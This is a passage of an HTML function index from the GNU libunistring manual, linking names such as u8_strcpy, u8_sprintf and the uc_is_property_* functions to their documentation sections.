href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX187"><code>u8_sprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX145"><code>u8_startswith</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX95"><code>u8_stpcpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX101"><code>u8_stpncpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX104"><code>u8_strcat</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX126"><code>u8_strchr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX111"><code>u8_strcmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX115"><code>u8_strcoll</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX167"><code>u8_strconv_from_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX173"><code>u8_strconv_from_locale</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX170"><code>u8_strconv_to_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX176"><code>u8_strconv_to_locale</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX92"><code>u8_strcpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX132"><code>u8_strcspn</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX122"><code>u8_strdup</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX85"><code>u8_strlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX72"><code>u8_strmblen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX76"><code>u8_strmbtouc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX107"><code>u8_strncat</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX118"><code>u8_strncmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX98"><code>u8_strncpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX88"><code>u8_strnlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX138"><code>u8_strpbrk</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX129"><code>u8_strrchr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX135"><code>u8_strspn</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX142"><code>u8_strstr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX151"><code>u8_strtok</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX709"><code>u8_strwidth</code></a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX23"><code>u8_to_u16</code></a></td><td valign="top"><a href="libunistring_4.html#SEC13">4.2 Elementary string conversions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX24"><code>u8_to_u32</code></a></td><td valign="top"><a href="libunistring_4.html#SEC13">4.2 Elementary string conversions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX823"><code>u8_tolower</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX826"><code>u8_totitle</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX820"><code>u8_toupper</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX198"><code>u8_u8_asnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX197"><code>u8_u8_asprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX196"><code>u8_u8_snprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX195"><code>u8_u8_sprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX202"><code>u8_u8_vasnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX201"><code>u8_u8_vasprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX200"><code>u8_u8_vsnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX199"><code>u8_u8_vsprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX41"><code>u8_uctomb</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX194"><code>u8_vasnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX193"><code>u8_vasprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX192"><code>u8_vsnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX191"><code>u8_vsprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX706"><code>u8_width</code></a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#IDX763"><code>u8_width_linebreaks</code></a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_11.html#IDX736"><code>u8_wordbreaks</code></a></td><td valign="top"><a href="libunistring_11.html#SEC45">11.1 Word breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX678"><code>uc_all_blocks</code></a></td><td valign="top"><a href="libunistring_8.html#SEC37">8.11 Blocks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX673"><code>uc_all_scripts</code></a></td><td valign="top"><a href="libunistring_8.html#SEC36">8.10 Scripts</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX414"><code>uc_bidi_category</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX412"><code>uc_bidi_category_byname</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX409"><code>uc_bidi_category_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX413"><code>uc_bidi_class</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX411"><code>uc_bidi_class_byname</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX410"><code>uc_bidi_class_long_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX408"><code>uc_bidi_class_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX676"><code>uc_block</code></a></td><td valign="top"><a href="libunistring_8.html#SEC37">8.11 Blocks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX674"><code>uc_block_t</code></a></td><td valign="top"><a href="libunistring_8.html#SEC37">8.11 Blocks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX686"><code>uc_c_ident_category</code></a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX786"><code>uc_canonical_decomposition</code></a></td><td valign="top"><a href="libunistring_13.html#SEC49">13.1 Decomposition of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX388"><code>uc_combining_class</code></a></td><td valign="top"><a href="libunistring_8.html#SEC24">8.2 Canonical combining class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX387"><code>uc_combining_class_byname</code></a></td><td valign="top"><a href="libunistring_8.html#SEC24">8.2 Canonical combining class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX386"><code>uc_combining_class_long_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC24">8.2 Canonical combining class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX385"><code>uc_combining_class_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC24">8.2 Canonical combining class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX787"><code>uc_composition</code></a></td><td valign="top"><a href="libunistring_13.html#SEC50">13.2 Composition of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX417"><code>uc_decimal_value</code></a></td><td valign="top"><a href="libunistring_8.html#SEC26">8.4 Decimal digit value</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX785"><code>uc_decomposition</code></a></td><td valign="top"><a href="libunistring_13.html#SEC49">13.1 Decomposition of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX418"><code>uc_digit_value</code></a></td><td valign="top"><a href="libunistring_8.html#SEC27">8.5 Digit value</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX419"><code>uc_fraction_t</code></a></td><td valign="top"><a href="libunistring_8.html#SEC28">8.6 Numeric value</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX324"><code>uc_general_category</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX319"><code>uc_general_category_and</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX320"><code>uc_general_category_and_not</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX323"><code>uc_general_category_byname</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX322"><code>uc_general_category_long_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX321"><code>uc_general_category_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX318"><code>uc_general_category_or</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX241"><code>uc_general_category_t</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX734"><code>uc_graphemeclusterbreak_property</code></a></td><td valign="top"><a href="libunistring_10.html#SEC43">10.2 Grapheme cluster break property</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX689"><code>uc_is_alnum</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX690"><code>uc_is_alpha</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX416"><code>uc_is_bidi_category</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX415"><code>uc_is_bidi_class</code></a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX700"><code>uc_is_blank</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX677"><code>uc_is_block</code></a></td><td valign="top"><a href="libunistring_8.html#SEC37">8.11 Blocks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX679"><code>uc_is_c_whitespace</code></a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX691"><code>uc_is_cntrl</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX692"><code>uc_is_digit</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX325"><code>uc_is_general_category</code></a></td><td valign="top"><a href="libunistring_8.html#SEC22">8.1.1 The object oriented API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX364"><code>uc_is_general_category_withtable</code></a></td><td valign="top"><a href="libunistring_8.html#SEC23">8.1.2 The bit mask API for general category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX693"><code>uc_is_graph</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX735"><code>uc_is_grapheme_break</code></a></td><td valign="top"><a href="libunistring_10.html#SEC43">10.2 Grapheme cluster break property</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX680"><code>uc_is_java_whitespace</code></a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX694"><code>uc_is_lower</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX695"><code>uc_is_print</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX581"><code>uc_is_property</code></a></td><td valign="top"><a href="libunistring_8.html#SEC34">8.9.1 Properties as objects &ndash; the object oriented API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX583"><code>uc_is_property_alphabetic</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX637"><code>uc_is_property_ascii_hex_digit</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX626"><code>uc_is_property_bidi_arabic_digit</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX622"><code>uc_is_property_bidi_arabic_right_to_left</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX628"><code>uc_is_property_bidi_block_separator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX632"><code>uc_is_property_bidi_boundary_neutral</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX627"><code>uc_is_property_bidi_common_separator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX619"><code>uc_is_property_bidi_control</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX634"><code>uc_is_property_bidi_embedding_or_override</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX624"><code>uc_is_property_bidi_eur_num_separator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX625"><code>uc_is_property_bidi_eur_num_terminator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX623"><code>uc_is_property_bidi_european_digit</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX621"><code>uc_is_property_bidi_hebrew_right_to_left</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX620"><code>uc_is_property_bidi_left_to_right</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX631"><code>uc_is_property_bidi_non_spacing_mark</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX635"><code>uc_is_property_bidi_other_neutral</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX633"><code>uc_is_property_bidi_pdf</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX629"><code>uc_is_property_bidi_segment_separator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX630"><code>uc_is_property_bidi_whitespace</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX599"><code>uc_is_property_case_ignorable</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX598"><code>uc_is_property_cased</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX603"><code>uc_is_property_changes_when_casefolded</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX604"><code>uc_is_property_changes_when_casemapped</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX600"><code>uc_is_property_changes_when_lowercased</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX602"><code>uc_is_property_changes_when_titlecased</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX601"><code>uc_is_property_changes_when_uppercased</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX661"><code>uc_is_property_combining</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX662"><code>uc_is_property_composite</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX656"><code>uc_is_property_currency_symbol</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX648"><code>uc_is_property_dash</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX663"><code>uc_is_property_decimal_digit</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX586"><code>uc_is_property_default_ignorable_code_point</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX588"><code>uc_is_property_deprecated</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX665"><code>uc_is_property_diacritic</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX666"><code>uc_is_property_extender</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX647"><code>uc_is_property_format_control</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX615"><code>uc_is_property_grapheme_base</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX616"><code>uc_is_property_grapheme_extend</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX618"><code>uc_is_property_grapheme_link</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX636"><code>uc_is_property_hex_digit</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX649"><code>uc_is_property_hyphen</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX608"><code>uc_is_property_id_continue</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX606"><code>uc_is_property_id_start</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX638"><code>uc_is_property_ideographic</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX641"><code>uc_is_property_ids_binary_operator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX642"><code>uc_is_property_ids_trinary_operator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX667"><code>uc_is_property_ignorable_control</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX646"><code>uc_is_property_iso_control</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> 